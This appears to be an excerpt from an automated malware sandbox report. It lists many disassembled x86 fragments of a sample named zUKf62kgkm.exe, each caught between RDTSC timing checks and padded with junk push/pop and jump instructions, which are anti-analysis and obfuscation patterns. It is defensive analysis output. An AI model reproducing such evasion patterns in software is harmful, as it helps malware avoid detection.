Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CB8F second address: 139CB99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CB99 second address: 139CB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CB9E second address: 139CBE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB4545A1B4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FCB4545A1BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007FCB4545A1ABh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CBE5 second address: 139CBEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 139CBEB second address: 139CC08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B6h 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13739B1 second address: 13739B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13739B5 second address: 13739BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13739BB second address: 13739C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 js 00007FCB44FB4546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A165B second address: 13A1661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A1661 second address: 13A1665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A1EBB second address: 13A1EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136CEED second address: 136CEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136CEF2 second address: 136CF24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FCB4545A1B5h 0x00000008 ja 00007FCB4545A1A6h 0x0000000e pop eax 0x0000000f pushad 0x00000010 jl 00007FCB4545A1A6h 0x00000016 jmp 00007FCB4545A1AAh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A8A4A second address: 13A8A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A9A56 second address: 13A9A6E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCB4545A1ACh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A9B15 second address: 13A9B48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FCB44FB455Eh 0x00000010 pushad 0x00000011 jmp 00007FCB44FB4550h 0x00000016 jc 00007FCB44FB4546h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jne 00007FCB44FB4546h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A9B48 second address: 13A9B6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCB4545A1B4h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13A9B6C second address: 13A9BBB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCB44FB454Ah 0x0000000b popad 0x0000000c pop eax 0x0000000d jmp 00007FCB44FB4557h 0x00000012 call 00007FCB44FB4549h 0x00000017 jmp 00007FCB44FB454Bh 0x0000001c push eax 0x0000001d pushad 0x0000001e ja 00007FCB44FB4548h 0x00000024 jbe 00007FCB44FB454Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA086 second address: 13AA090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCB4545A1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA090 second address: 13AA0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jng 00007FCB44FB4548h 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA339 second address: 13AA33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA33E second address: 13AA344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA344 second address: 13AA361 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f js 00007FCB4545A1A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA361 second address: 13AA366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA80A second address: 13AA821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCB4545A1B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AA945 second address: 13AA94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ACBFE second address: 13ACC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCB4545A1A6h 0x0000000a jnl 00007FCB4545A1A8h 0x00000010 jns 00007FCB4545A1B2h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FCB4545A1B2h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ACC2D second address: 13ACC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ACC33 second address: 13ACC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jnl 00007FCB4545A1A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13ACC40 second address: 13ACC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AD292 second address: 13AD2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FCB4545A1B0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AF792 second address: 13AF798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AF4B3 second address: 13AF4B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13AF798 second address: 13AF79C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B1A8C second address: 13B1A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B0CDC second address: 13B0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B1A90 second address: 13B1A9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B1A9A second address: 13B1A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B21F3 second address: 13B21F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B6C7A second address: 13B6C7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B7BCC second address: 13B7BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FCB4545A1B8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FCB4545A1A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B8C57 second address: 13B8C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B6C7F second address: 13B6CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jo 00007FCB4545A1BCh 0x0000000f jmp 00007FCB4545A1B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BAAE8 second address: 13BAAED instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BBB00 second address: 13BBB62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FCB4545A1ABh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sub dword ptr [ebp+122D208Ch], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov edi, eax 0x00000026 mov eax, dword ptr [ebp+122D0BC5h] 0x0000002c jl 00007FCB4545A1B3h 0x00000032 mov dword ptr [ebp+122D297Dh], edx 0x00000038 push FFFFFFFFh 0x0000003a xor dword ptr [ebp+122D3197h], esi 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 je 00007FCB4545A1ACh 0x00000049 jns 00007FCB4545A1A6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BC961 second address: 13BC966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B7CC5 second address: 13B7CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B9D3C second address: 13B9D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FCB44FB454Ch 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BBB62 second address: 13BBB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B6D62 second address: 13B6D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BCB9D second address: 13BCBAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FCB4545A1A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BE9FC second address: 13BEA1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FCB44FB4557h 0x00000010 jmp 00007FCB44FB4551h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BCBAB second address: 13BCBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BCBAF second address: 13BCBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BCBBC second address: 13BCBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C2B17 second address: 13C2B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C3BFC second address: 13C3C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C4BEA second address: 13C4BF4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCB44FB4546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C4BF4 second address: 13C4BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BFD19 second address: 13BFD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BFD1D second address: 13BFD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jg 00007FCB4545A1A6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 push edx 0x00000016 sub dword ptr [ebp+1244F08Eh], ebx 0x0000001c pop ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 and edi, dword ptr [ebp+122D1C05h] 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 push ebx 0x00000032 mov edi, dword ptr [ebp+122D3678h] 0x00000038 pop ebx 0x00000039 mov eax, dword ptr [ebp+122D0D39h] 0x0000003f mov edi, dword ptr [ebp+122D27FAh] 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007FCB4545A1A8h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 mov ebx, dword ptr [ebp+122D3554h] 0x00000067 movzx ebx, di 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007FCB4545A1A6h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13BFD95 second address: 13BFDAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C7A1D second address: 13C7A38 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FCB4545A1B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13C7A38 second address: 13C7A7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCB44FB4554h 0x00000008 je 00007FCB44FB4546h 0x0000000e jmp 00007FCB44FB4556h 0x00000013 jl 00007FCB44FB4546h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007FCB44FB4546h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13CA6B0 second address: 13CA6CF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCB4545A1A6h 0x00000008 jmp 00007FCB4545A1ADh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FCB4545A1A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13CA6CF second address: 13CA6D9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCB44FB4546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1371EF0 second address: 1371EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1371EF6 second address: 1371F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCB44FB454Ch 0x0000000c popad 0x0000000d pushad 0x0000000e js 00007FCB44FB4548h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1371F17 second address: 1371F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1371F23 second address: 1371F29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136B41B second address: 136B421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136B421 second address: 136B425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1370467 second address: 137046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 137046B second address: 1370488 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FCB44FB4552h 0x0000000e jns 00007FCB44FB4546h 0x00000014 jne 00007FCB44FB4546h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1370488 second address: 1370490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D0918 second address: 13D0939 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCB44FB4546h 0x00000008 jo 00007FCB44FB4546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 jc 00007FCB44FB4556h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jnl 00007FCB44FB4546h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D0C27 second address: 13D0C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D0C2B second address: 13D0C4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCB44FB454Dh 0x0000000e jng 00007FCB44FB4546h 0x00000014 ja 00007FCB44FB4546h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D0C4F second address: 13D0C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jo 00007FCB4545A1B8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D0C5F second address: 13D0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D7D7A second address: 13D7D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D7D7E second address: 13D7D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D7D88 second address: 13D7D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCB4545A1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D861E second address: 13D8662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e pushad 0x0000000f js 00007FCB44FB4546h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop eax 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FCB44FB4556h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D8662 second address: 13D8692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCB4545A1B1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCB4545A1B1h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13D8692 second address: 13D869C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCB44FB454Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
